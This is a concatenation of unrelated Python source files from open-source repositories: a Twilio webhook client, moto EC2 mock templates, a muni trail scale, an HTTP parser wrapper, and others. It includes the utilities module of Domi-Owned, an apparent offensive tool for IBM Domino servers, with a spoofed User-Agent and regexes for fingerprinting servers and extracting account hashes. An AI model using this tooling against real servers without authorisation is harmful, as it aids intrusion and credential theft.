response['result'] = ''
response['status'] = 5
else:
response['result'] = ''
response['status'] = 0
return response
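

if __name__ == '__main__':
    # Minimal usage sketch: fetch and print the English warning summary
    # (requires network access to the HKO endpoint).
    print(weather_warning(lang='EN'))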
| mit | -331,712,446,974,401,000 | 28.25 | 99 | 0.554606 | false | 3.871324 | false | false | false |
twilio/twilio-python | twilio/rest/autopilot/v1/assistant/webhook.py | 2 | 17306 | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class WebhookList(ListResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact [email protected]. """
def __init__(self, version, assistant_sid):
"""
Initialize the WebhookList
:param Version version: Version that contains the resource
:param assistant_sid: The SID of the Assistant that is the parent of the resource
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookList
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookList
"""
super(WebhookList, self).__init__(version)
# Path Solution
self._solution = {'assistant_sid': assistant_sid, }
self._uri = '/Assistants/{assistant_sid}/Webhooks'.format(**self._solution)
def stream(self, limit=None, page_size=None):
"""
Streams WebhookInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(page_size=limits['page_size'], )
return self._version.stream(page, limits['limit'])
def list(self, limit=None, page_size=None):
"""
Lists WebhookInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance]
"""
return list(self.stream(limit=limit, page_size=page_size, ))
def page(self, page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of WebhookInstance records from the API.
Request is executed immediately
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookPage
"""
data = values.of({'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, })
response = self._version.page(method='GET', uri=self._uri, params=data, )
return WebhookPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of WebhookInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return WebhookPage(self._version, response, self._solution)
def create(self, unique_name, events, webhook_url, webhook_method=values.unset):
"""
Create the WebhookInstance
:param unicode unique_name: An application-defined string that uniquely identifies the resource
:param unicode events: The list of space-separated events that this Webhook will subscribe to.
:param unicode webhook_url: The URL associated with this Webhook.
:param unicode webhook_method: The method to be used when calling the webhook's URL.
:returns: The created WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
data = values.of({
'UniqueName': unique_name,
'Events': events,
'WebhookUrl': webhook_url,
'WebhookMethod': webhook_method,
})
payload = self._version.create(method='POST', uri=self._uri, data=data, )
return WebhookInstance(self._version, payload, assistant_sid=self._solution['assistant_sid'], )
def get(self, sid):
"""
Constructs a WebhookContext
:param sid: The unique string that identifies the resource to fetch
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
"""
return WebhookContext(self._version, assistant_sid=self._solution['assistant_sid'], sid=sid, )
def __call__(self, sid):
"""
Constructs a WebhookContext
:param sid: The unique string that identifies the resource to fetch
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
"""
return WebhookContext(self._version, assistant_sid=self._solution['assistant_sid'], sid=sid, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Autopilot.V1.WebhookList>'
class WebhookPage(Page):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact [email protected]. """
def __init__(self, version, response, solution):
"""
Initialize the WebhookPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param assistant_sid: The SID of the Assistant that is the parent of the resource
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookPage
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookPage
"""
super(WebhookPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of WebhookInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
return WebhookInstance(self._version, payload, assistant_sid=self._solution['assistant_sid'], )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Autopilot.V1.WebhookPage>'
class WebhookContext(InstanceContext):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact [email protected]. """
def __init__(self, version, assistant_sid, sid):
"""
Initialize the WebhookContext
:param Version version: Version that contains the resource
:param assistant_sid: The SID of the Assistant that is the parent of the resource to fetch
:param sid: The unique string that identifies the resource to fetch
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
"""
super(WebhookContext, self).__init__(version)
# Path Solution
self._solution = {'assistant_sid': assistant_sid, 'sid': sid, }
self._uri = '/Assistants/{assistant_sid}/Webhooks/{sid}'.format(**self._solution)
def fetch(self):
"""
Fetch the WebhookInstance
:returns: The fetched WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
payload = self._version.fetch(method='GET', uri=self._uri, )
return WebhookInstance(
self._version,
payload,
assistant_sid=self._solution['assistant_sid'],
sid=self._solution['sid'],
)
def update(self, unique_name=values.unset, events=values.unset,
webhook_url=values.unset, webhook_method=values.unset):
"""
Update the WebhookInstance
:param unicode unique_name: An application-defined string that uniquely identifies the resource
:param unicode events: The list of space-separated events that this Webhook will subscribe to.
:param unicode webhook_url: The URL associated with this Webhook.
:param unicode webhook_method: The method to be used when calling the webhook's URL.
:returns: The updated WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
data = values.of({
'UniqueName': unique_name,
'Events': events,
'WebhookUrl': webhook_url,
'WebhookMethod': webhook_method,
})
payload = self._version.update(method='POST', uri=self._uri, data=data, )
return WebhookInstance(
self._version,
payload,
assistant_sid=self._solution['assistant_sid'],
sid=self._solution['sid'],
)
def delete(self):
"""
Deletes the WebhookInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._version.delete(method='DELETE', uri=self._uri, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Autopilot.V1.WebhookContext {}>'.format(context)
class WebhookInstance(InstanceResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact [email protected]. """
def __init__(self, version, payload, assistant_sid, sid=None):
"""
Initialize the WebhookInstance
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
super(WebhookInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'url': payload.get('url'),
'account_sid': payload.get('account_sid'),
'date_created': deserialize.iso8601_datetime(payload.get('date_created')),
'date_updated': deserialize.iso8601_datetime(payload.get('date_updated')),
'assistant_sid': payload.get('assistant_sid'),
'sid': payload.get('sid'),
'unique_name': payload.get('unique_name'),
'events': payload.get('events'),
'webhook_url': payload.get('webhook_url'),
'webhook_method': payload.get('webhook_method'),
}
# Context
self._context = None
self._solution = {'assistant_sid': assistant_sid, 'sid': sid or self._properties['sid'], }
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: WebhookContext for this WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
"""
if self._context is None:
self._context = WebhookContext(
self._version,
assistant_sid=self._solution['assistant_sid'],
sid=self._solution['sid'],
)
return self._context
@property
def url(self):
"""
:returns: The absolute URL of the Webhook resource
:rtype: unicode
"""
return self._properties['url']
@property
def account_sid(self):
"""
:returns: The SID of the Account that created the resource
:rtype: unicode
"""
return self._properties['account_sid']
@property
def date_created(self):
"""
:returns: The RFC 2822 date and time in GMT when the resource was created
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The RFC 2822 date and time in GMT when the resource was last updated
:rtype: datetime
"""
return self._properties['date_updated']
@property
def assistant_sid(self):
"""
:returns: The SID of the Assistant that is the parent of the resource
:rtype: unicode
"""
return self._properties['assistant_sid']
@property
def sid(self):
"""
:returns: The unique string that identifies the resource
:rtype: unicode
"""
return self._properties['sid']
@property
def unique_name(self):
"""
:returns: An application-defined string that uniquely identifies the resource
:rtype: unicode
"""
return self._properties['unique_name']
@property
def events(self):
"""
:returns: The list of space-separated events that this Webhook is subscribed to.
:rtype: unicode
"""
return self._properties['events']
@property
def webhook_url(self):
"""
:returns: The URL associated with this Webhook.
:rtype: unicode
"""
return self._properties['webhook_url']
@property
def webhook_method(self):
"""
:returns: The method used when calling the webhook's URL.
:rtype: unicode
"""
return self._properties['webhook_method']
def fetch(self):
"""
Fetch the WebhookInstance
:returns: The fetched WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
return self._proxy.fetch()
def update(self, unique_name=values.unset, events=values.unset,
webhook_url=values.unset, webhook_method=values.unset):
"""
Update the WebhookInstance
:param unicode unique_name: An application-defined string that uniquely identifies the resource
:param unicode events: The list of space-separated events that this Webhook will subscribe to.
:param unicode webhook_url: The URL associated with this Webhook.
:param unicode webhook_method: The method to be used when calling the webhook's URL.
:returns: The updated WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
return self._proxy.update(
unique_name=unique_name,
events=events,
webhook_url=webhook_url,
webhook_method=webhook_method,
)
def delete(self):
"""
Deletes the WebhookInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._proxy.delete()
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Autopilot.V1.WebhookInstance {}>'.format(context)
| mit | 3,099,753,894,173,314,600 | 35.510549 | 103 | 0.62747 | false | 4.336257 | false | false | false |
coldfusion39/domi-owned | domi_owned/utilities.py | 1 | 4849 | # Copyright (c) 2017, Brandan Geise [coldfusion]
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging.handlers
import re
import sys
import tqdm
class Utilities(object):
"""
Utility functions.
"""
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close'
}
URL_REGEX = re.compile(r'(https?:\/\/[\d\w.:-]+)', re.I)
FORM_REGEX = re.compile(r'method[\'\"= ]{1,4}post[\'\"]?', re.I)
OPEN_REGEX = re.compile(r'name[\'\"= ]{1,4}notesview[\'\"]?', re.I)
ACCOUNT_REGEX = re.compile(r'/([a-f0-9]{32}/[a-f0-9]{32})', re.I)
USER_FIELD_REGEX = re.compile(r'user.+', re.I)
REDIRECT_FIELD_REGEX = re.compile(r'redirect.+', re.I)
NAMES_REGEX = re.compile(r'name[\'\"= ]{1,4}notesview[\'\"]?', re.I)
WEBADMIN_REGEX = re.compile(r'<title>.*administration</title>', re.I)
RESTRICTED_REGEX = re.compile(r'(notes exception|not authorized)', re.I)
VERSION_REGEX = re.compile(r'(?:version|domino administrator|domino|release)[=":\s]{0,4}([\d.]+)(?:\s|\")?', re.I)
LINUX_USER_REGEX = re.compile(r'([a-z0-9-_].+):(.+)', re.I)
WINDOWS_USER_REGEX = re.compile(r'(.+)\\(.+)', re.I)
PATH_REGEX = re.compile(r'DataDirectory\s*=\s*\'(.+)\';', re.I)
def set_logging(self):
"""
Configure the basic logging environment for the application.
"""
logger = logging.getLogger('DomiOwned')
logger.setLevel(logging.DEBUG)
custom_format = CustomLoggingFormatter()
handler = logging.StreamHandler()
handler.setFormatter(custom_format)
logger.addHandler(handler)
return logger
def parse_credentials(self, value):
"""
Handle credentials if value is None.
"""
return '' if value is None else value
def check_url(self, url):
"""
Check for valid base URL.
"""
if self.URL_REGEX.search(url):
return self.URL_REGEX.search(url).group(1)
else:
self.logger.error('Invalid URL provided')
sys.exit()
def setup_progress(self, total):
"""
Setup progress bar.
"""
progress_bar = tqdm.tqdm(
total=total,
desc="Progress",
smoothing=0.5,
bar_format='{desc}{percentage:3.0f}%|{bar}|({n_fmt}/{total_fmt})|{elapsed} '
)
return progress_bar
class CustomLoggingFormatter(logging.Formatter):
"""
Custom logging formatter.
"""
DEBUG_FORMAT = "\033[1m\033[34m[*]\033[0m %(msg)s"
INFO_FORMAT = "\033[1m\033[32m[+]\033[0m %(msg)s"
WARN_FORMAT = "\033[1m\033[33m[!]\033[0m %(msg)s"
ERROR_FORMAT = "\033[1m\033[31m[-]\033[0m %(msg)s"
def __init__(self):
super().__init__(fmt="%(levelno)d: %(msg)s", datefmt=None, style='%')
def format(self, record):
orig_format = self._style._fmt
if record.levelno == logging.DEBUG:
self._style._fmt = CustomLoggingFormatter.DEBUG_FORMAT
elif record.levelno == logging.INFO:
self._style._fmt = CustomLoggingFormatter.INFO_FORMAT
elif record.levelno == logging.WARN:
self._style._fmt = CustomLoggingFormatter.WARN_FORMAT
elif record.levelno == logging.ERROR:
self._style._fmt = CustomLoggingFormatter.ERROR_FORMAT
result = logging.Formatter.format(self, record)
self._style._fmt = orig_format
return result
class Banner(object):
"""
Domi-Owned visual banner.
"""
SHOW = """
__________ __________ __________
| |\| | |\\
| * * ||| * * * | * ||
| * * ||| | * ||
| * * ||| * * * | * ||
|__________|||__________|__________||
| || `---------------------`
| * * ||
| ||
| * * ||
|__________||
`----------`
IBM/Lotus Domino OWNage
"""
| mit | -4,950,852,801,846,686,000 | 32.673611 | 133 | 0.621984 | false | 3.036318 | false | false | false |
ZuluPro/moto | moto/ec2/responses/vpc_peering_connections.py | 4 | 5068 | from __future__ import unicode_literals
from moto.core.responses import BaseResponse
class VPCPeeringConnections(BaseResponse):
def create_vpc_peering_connection(self):
vpc = self.ec2_backend.get_vpc(self._get_param('VpcId'))
peer_vpc = self.ec2_backend.get_vpc(self._get_param('PeerVpcId'))
vpc_pcx = self.ec2_backend.create_vpc_peering_connection(vpc, peer_vpc)
template = self.response_template(
CREATE_VPC_PEERING_CONNECTION_RESPONSE)
return template.render(vpc_pcx=vpc_pcx)
def delete_vpc_peering_connection(self):
vpc_pcx_id = self._get_param('VpcPeeringConnectionId')
vpc_pcx = self.ec2_backend.delete_vpc_peering_connection(vpc_pcx_id)
template = self.response_template(
DELETE_VPC_PEERING_CONNECTION_RESPONSE)
return template.render(vpc_pcx=vpc_pcx)
def describe_vpc_peering_connections(self):
vpc_pcxs = self.ec2_backend.get_all_vpc_peering_connections()
template = self.response_template(
DESCRIBE_VPC_PEERING_CONNECTIONS_RESPONSE)
return template.render(vpc_pcxs=vpc_pcxs)
def accept_vpc_peering_connection(self):
vpc_pcx_id = self._get_param('VpcPeeringConnectionId')
vpc_pcx = self.ec2_backend.accept_vpc_peering_connection(vpc_pcx_id)
template = self.response_template(
ACCEPT_VPC_PEERING_CONNECTION_RESPONSE)
return template.render(vpc_pcx=vpc_pcx)
def reject_vpc_peering_connection(self):
vpc_pcx_id = self._get_param('VpcPeeringConnectionId')
self.ec2_backend.reject_vpc_peering_connection(vpc_pcx_id)
template = self.response_template(
REJECT_VPC_PEERING_CONNECTION_RESPONSE)
return template.render()
CREATE_VPC_PEERING_CONNECTION_RESPONSE = """
<CreateVpcPeeringConnectionResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<vpcPeeringConnection>
<vpcPeeringConnectionId>{{ vpc_pcx.id }}</vpcPeeringConnectionId>
<requesterVpcInfo>
<ownerId>777788889999</ownerId>
<vpcId>{{ vpc_pcx.vpc.id }}</vpcId>
<cidrBlock>{{ vpc_pcx.vpc.cidr_block }}</cidrBlock>
</requesterVpcInfo>
<accepterVpcInfo>
<ownerId>123456789012</ownerId>
<vpcId>{{ vpc_pcx.peer_vpc.id }}</vpcId>
</accepterVpcInfo>
<status>
<code>initiating-request</code>
<message>Initiating request to {accepter ID}.</message>
</status>
<expirationTime>2014-02-18T14:37:25.000Z</expirationTime>
<tagSet/>
</vpcPeeringConnection>
</CreateVpcPeeringConnectionResponse>
"""
DESCRIBE_VPC_PEERING_CONNECTIONS_RESPONSE = """
<DescribeVpcPeeringConnectionsResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<vpcPeeringConnectionSet>
{% for vpc_pcx in vpc_pcxs %}
<item>
<vpcPeeringConnectionId>{{ vpc_pcx.id }}</vpcPeeringConnectionId>
<requesterVpcInfo>
<ownerId>777788889999</ownerId>
<vpcId>{{ vpc_pcx.vpc.id }}</vpcId>
<cidrBlock>{{ vpc_pcx.vpc.cidr_block }}</cidrBlock>
</requesterVpcInfo>
<accepterVpcInfo>
<ownerId>123456789012</ownerId>
<vpcId>{{ vpc_pcx.peer_vpc.id }}</vpcId>
</accepterVpcInfo>
<status>
<code>{{ vpc_pcx._status.code }}</code>
<message>{{ vpc_pcx._status.message }}</message>
</status>
<expirationTime>2014-02-17T16:00:50.000Z</expirationTime>
<tagSet/>
</item>
{% endfor %}
</vpcPeeringConnectionSet>
</DescribeVpcPeeringConnectionsResponse>
"""
DELETE_VPC_PEERING_CONNECTION_RESPONSE = """
<DeleteVpcPeeringConnectionResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<return>true</return>
</DeleteVpcPeeringConnectionResponse>
"""
ACCEPT_VPC_PEERING_CONNECTION_RESPONSE = """
<AcceptVpcPeeringConnectionResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<vpcPeeringConnection>
<vpcPeeringConnectionId>{{ vpc_pcx.id }}</vpcPeeringConnectionId>
<requesterVpcInfo>
<ownerId>123456789012</ownerId>
<vpcId>{{ vpc_pcx.vpc.id }}</vpcId>
<cidrBlock>{{ vpc_pcx.vpc.cidr_block }}</cidrBlock>
</requesterVpcInfo>
<accepterVpcInfo>
<ownerId>777788889999</ownerId>
<vpcId>{{ vpc_pcx.peer_vpc.id }}</vpcId>
<cidrBlock>{{ vpc_pcx.peer_vpc.cidr_block }}</cidrBlock>
</accepterVpcInfo>
<status>
<code>{{ vpc_pcx._status.code }}</code>
<message>{{ vpc_pcx._status.message }}</message>
</status>
<tagSet/>
</vpcPeeringConnection>
</AcceptVpcPeeringConnectionResponse>
"""
REJECT_VPC_PEERING_CONNECTION_RESPONSE = """
<RejectVpcPeeringConnectionResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<return>true</return>
</RejectVpcPeeringConnectionResponse>
"""
| apache-2.0 | -1,107,759,523,004,262,400 | 37.687023 | 88 | 0.681926 | false | 3.149782 | false | false | false |
schocco/mds-web | apps/muni_scales/mscale.py | 1 | 5171 | # -*- coding: utf-8 -*-
from django.utils.encoding import force_unicode
from django.utils.translation import ugettext_lazy as _
class Mscale(object):
"""
M scale, describing the difficultiy of a single muni trail section.
"""
levels = (0.0, 0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0)
def __init__(self, *args, **kwargs):
"""
initial values can be provided via kwargs.
:param number: difficulty level, e.g. 2 for M2
:type number: int
:param underground: description of the trail underground
:type underground: str.
:param slope: slope
:param obstacles: list of obstacles
:type obstacles: list
:param characteristics: list of other characteristics
that describe the trail section
:type characteristics: list
"""
self.number = float(kwargs.pop(u"number", 0))
self.underground = kwargs.pop(u"underground", "")
self.slope = kwargs.pop(u"slope", "")
self.obstacles = kwargs.pop(u"obstacles", [])
self.characteristics = kwargs.pop(u"characteristics", [])
def __unicode__(self):
return force_unicode(u"M%s" % self.number or u'M')
def __str__(self):
return str(self.__unicode__())
def __eq__(self, other):
if isinstance(other, Mscale):
return self.number == other.number
elif isinstance(other, (int, float)):
return self.number == other
else:
return False
# raise TypeError(u"Cannot compare Mscale object with %s" % str(other))
def __ne__(self, other):
return not self.__eq__(other)
def __cmp__(self, other):
"""
Also allows comparisons between mscale instances and numbers.
"""
if (isinstance(other, Mscale)):
return cmp(self.number, other.number)
elif (isinstance(other, int) or isinstance(other, float)):
return cmp(self.number, other)
else:
raise TypeError(_(u"Cannot compare Mscale object with {0}").format(other))
def __hash__(self):
return hash(unicode(self))
MSCALES = {}
MSCALES[0] = Mscale(number=0.0,
underground=_(u"pavement or solid soil/compact gravel"),
slope="< 20 %",
obstacles=[_(u"no obstacles")],
characteristics=[_(u"90° turns within > 2 m and with slope < 10 %")]
)
MSCALES[0.5] = Mscale(number=0.5)
MSCALES[1] = Mscale(number=1.0,
underground=_(u"partly loose soil/gravel"),
slope="< 40 %",
obstacles=[_(u"small obstacles, approx. 5cm high (small stones, flat roots)"),
_(u"single 15 cm steps")],
characteristics=[_(u"90° turn within > 1 m and with slope < 20 %")]
)
MSCALES[1.5] = Mscale(number=1.5)
MSCALES[2] = Mscale(number=2.0,
underground=_(u"loose soil/gravel"),
slope="< 60 %",
obstacles=[_(u"obstacles, approx. 10 cm high (stones, roots"),
_(u"single 30 cm steps")
],
characteristics=[_(u"90° turn within > 0.5 m and with slope < 30 %")]
)
MSCALES[2.5] = Mscale(number=2.5)
MSCALES[3] = Mscale(number=3.0,
underground=_(u"loose soil with loose stones (size of few cm)"),
slope="< 80 %",
obstacles=[_(u"obstacles that are approx 20cm high (stones, roots)"),
_(u"several irregular steps, approx. 20 cm each"),
_(u"drops < 1 m"),
_(u"gaps < 0.5 m")],
characteristics=[_(u"135° turn within ~ 0.5 m and with slope < 40 %")]
)
MSCALES[3.5] = Mscale(number=3.5)
MSCALES[4] = Mscale(number=4.0,
underground=_(u"very loose/slippery soil with loose stones (size of several cm)"),
slope="< 100 %",
obstacles=[_(u"big obstacles (stones, logs ~ 30 cm)"),
_(u"several irregular steps ~ 30 cm each"),
_(u"drops < 1.5 m"),
_(u"gaps < 1 m")],
characteristics=[_(u"135° turn within ~ 0.5 m and with slope < 60 %")]
)
MSCALES[4.5] = Mscale(number=4.5)
MSCALES[5] = Mscale(number=5.0,
underground=_(u"very loose/slippery soil with loose stones (size of several cm)"),
slope="> 100 %",
obstacles=[_(u"very big obstacles (stones, logs ~ 40 cm)"),
_(u"several irregular steps ~ 40 cm each"),
_(u"drops > 1.5 m, gaps > 1 m")],
characteristics=[_(u"135° turn within ~ 0.5 m and with slope < 80 %")]
)
MSCALE_CHOICES = tuple((m, "M %s" % str(m).replace(".0", "")) for m in Mscale.levels)
| mit | -7,137,288,401,920,602,000 | 38.730769 | 102 | 0.500871 | false | 3.707825 | false | false | false |
Lukasa/pycohttpparser | src/pycohttpparser/api.py | 1 | 6580 | # -*- coding: utf-8 -*-
"""
pycohttpparser/api
~~~~~~~~~~~~~~~~~~
Defines the public API to pycohttpparser.
"""
from collections import namedtuple
from ._pycohttpparser import lib, ffi
Request = namedtuple(
'Request', ['method', 'path', 'minor_version', 'headers', 'consumed']
)
Response = namedtuple(
'Response', ['status', 'msg', 'minor_version', 'headers', 'consumed']
)
class ParseError(Exception):
"""
An invalid HTTP message was passed to the parser.
"""
class Parser(object):
"""
A single HTTP parser object. This object can parse HTTP requests and
responses using picohttpparser.
This object is not thread-safe, and it does maintain state that is shared
across parsing requests. For this reason, make sure that access to this
object is synchronized if you use it across multiple threads.
"""
def __init__(self):
# Store some instance variables. This represents essentially static
# allocations that are used repeatedly in some of the parsing code.
# This avoids the overhead of repeatedly allocating large chunks of
# memory each time a parse is called.
# Allocate all the data that will come out of the method.
self._method = self._msg = ffi.new("char **")
self._method_len = self._msg_len = ffi.new("size_t *")
self._path = ffi.new("char **")
self._path_len = ffi.new("size_t *")
self._minor_version = ffi.new("int *")
self._status = ffi.new("int *")
# Allow space for 1000 headers. Anything more is clearly nonsense.
self._header_count = 1000
self._headers = ffi.new("struct phr_header [1000]")
self._num_headers = ffi.new("size_t *", self._header_count)
def parse_request(self, buffer):
"""
Parses a single HTTP request from a buffer.
:param buffer: A ``memoryview`` object wrapping a buffer containing a
HTTP request.
:returns: A :class:`Request <pycohttpparser.api.Request>` object, or
``None`` if there is not enough data in the buffer.
"""
# Allocate function inputs
buffer_size = ffi.cast("size_t", len(buffer))
phr_buffer = ffi.new("char []", buffer.tobytes())
last_len = ffi.cast("size_t", 0)
# Reset the header count.
self._num_headers[0] = self._header_count
# Do the parse.
pret = lib.phr_parse_request(
phr_buffer,
buffer_size,
self._method,
self._method_len,
self._path,
self._path_len,
self._minor_version,
self._headers,
self._num_headers,
last_len
)
# Check for insufficient data or parse errors.
if pret == -2:
return None
elif pret == -1:
raise ParseError("Invalid message")
# If we got here we have a full request. We need to return useful
# data. A useful trick here: all the returned char pointers are
# pointers into buffer. This means we can use them as offsets and
# return memoryviews to their data. Snazzy, right?
method = b''
path = b''
minor_version = -1
offset = self._method[0] - phr_buffer
element_len = self._method_len[0]
method = buffer[offset:offset+element_len]
offset = self._path[0] - phr_buffer
element_len = self._path_len[0]
path = buffer[offset:offset+element_len]
minor_version = self._minor_version[0]
# We can create the Request object now, because all the scalar fields
# are ready. We can put the headers into a list already hung from it.
req = Request(method, path, minor_version, [], pret)
for header in self._build_headers(phr_buffer, buffer):
req.headers.append(header)
return req
def parse_response(self, buffer):
"""
Parses a single HTTP response from a buffer.
:param buffer: A ``memoryview`` object wrapping a buffer containing a
HTTP response.
:returns: A :class:`Response <pycohttpparser.api.Response>` object, or
``None`` if there is not enough data in the buffer.
"""
# Allocate function inputs
buffer_size = ffi.cast("size_t", len(buffer))
phr_buffer = ffi.new("char []", buffer.tobytes())
last_len = ffi.cast("size_t", 0)
# Reset the header count.
self._num_headers[0] = self._header_count
# Do the parse.
pret = lib.phr_parse_response(
phr_buffer,
buffer_size,
self._minor_version,
self._status,
self._msg,
self._msg_len,
self._headers,
self._num_headers,
last_len
)
# Check for insufficient data or parse errors.
if pret == -2:
return None
elif pret == -1:
raise ParseError("Invalid message")
# If we got here we have a full request. We need to return useful
# data. A useful trick here: all the returned char pointers are
# pointers into buffer. This means we can use them as offsets and
# return memoryviews to their data. Snazzy, right?
msg = b''
status = 0
minor_version = -1
status = self._status[0]
offset = self._msg[0] - phr_buffer
element_len = self._msg_len[0]
msg = buffer[offset:offset+element_len]
minor_version = self._minor_version[0]
# We can create the Request object now, because all the scalar fields
# are ready. We can put the headers into a list already hung from it.
req = Response(status, msg, minor_version, [], pret)
for header in self._build_headers(phr_buffer, buffer):
req.headers.append(header)
return req
def _build_headers(self, phr_buffer, orig_buffer):
"""
Called by a parsing routine to build a collection of header names and
values.
"""
for index in range(self._num_headers[0]):
header_struct = self._headers[index]
name_index = header_struct.name - phr_buffer
value_index = header_struct.value - phr_buffer
name_len = header_struct.name_len
value_len = header_struct.value_len
name = orig_buffer[name_index:name_index+name_len]
